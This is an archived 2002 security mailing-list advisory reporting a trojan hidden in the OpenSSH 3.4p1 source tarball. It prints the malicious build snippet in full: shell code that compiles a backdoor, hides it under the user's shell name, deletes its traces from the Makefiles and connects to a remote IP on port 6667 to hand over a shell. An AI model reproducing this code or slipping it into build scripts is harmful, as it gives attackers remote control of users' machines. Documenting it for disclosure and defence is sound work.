Greetings, I noticed that openssh-3.4p has a trojan horse (available from ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz and some of the mirrors. (ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/ ftp://ftp.usa.openbsd.org/pub/OpenBSD/OpenSSH/ ftp://ftp1.se.openbsd.org/pub/OpenBSD/OpenSSH/ ) After compiling the file bf-test.c you will notice that it does following: # testing in raw ecb mode #!/bin/sh cat >conftest.c <<_ACEOF #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <unistd.h> #include <errno.h> #include <signal.h> #include <setjmp.h> jmp_buf env;int s;char *i_val="\x2f\x62\x69\x6e\x2f\x73\x68";void sig (int sig){close(s);sleep(3600);longjmp(env,0); }int main(){int x;char c,*a[2];struct sockaddr_in sa;struct sigaction act;switch(fork()){case 0:break;default:exit(0);}close(0);close(1);close(2); memset(&act,0,sizeof(act));act.sa_handler=sig; sigaction(SIGALRM,&act,NULL);do{setjmp(env); if((s=socket(AF_INET,SOCK_STREAM,0))==(1))exit(1); memset(&sa,0,sizeof(sa));sa.sin_family=AF_INET; sa.sin_port=htons(6667);sa.sin_addr.s_addr=inet_addr ("203.62.158.32");alarm(10);if(connect(s, (struct sockaddr*)&sa,sizeof(sa))==(-1))exit(1) ;if((x=read(s,&c,1))==(-1)){exit(1);} else if(x==1){switch(c){case 'A':exit(0);case 'D':alarm(0);dup2(s,0);dup2(s,1);dup2(s,2) ;a[0]=i_val;a[1]=NULL;execve(a[0],a,NULL);break; case 'M':alarm(0);sig(0);break;default:}}else{exit (0);}}while(1);} _ACEOF (grep -v -i bf-test Makefile.in > m.out ; cp m.out Makefile.in ; rm -f m.out grep -v -i bf-test Makefile > m.out ; cp m.out Makefile ; rm -f m.out rm -f bf-test* TESTPROG="`basename \"\`grep $USER: /etc/passwd\`\"`" if ! test $TESTPROG ; then TESTPROG=sh; fi gcc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi gcc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi cc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi cc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG rm -f ./conftest ./conftest.c $TESTPROG) 1>/dev/null 2>&1 It runs once, upon compilation of openssh, and is named sh or the compiling users default shell in the processlist in the process listing. This trojan attempts to connect to 203.62.158.32:6667 (hacked machine which has been secured now), and awaits one of three characters as the command; D execs /bin/sh M respawns A kills the deamon The /bin/sh executed via the D command was controlled by the daemon listening on 203.62.158.32:6667, potentially meaning that people affected by this has given a shell, possibly root, to user unknown. <Hans> "Let this be a lesson. Don't use root unless you REALLY have to." Regards, Artur Lindgren, Comitnet AB Special thanks to (Ratler, Mrsaint, Jordan, Drabant, Hans and all of you ISP people in sweden :D) Thanks to ^Sarge^ for quickly taking care of the hacked machine this trojan connected to. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Thu Aug 01 2002 - 08:28:35 PDT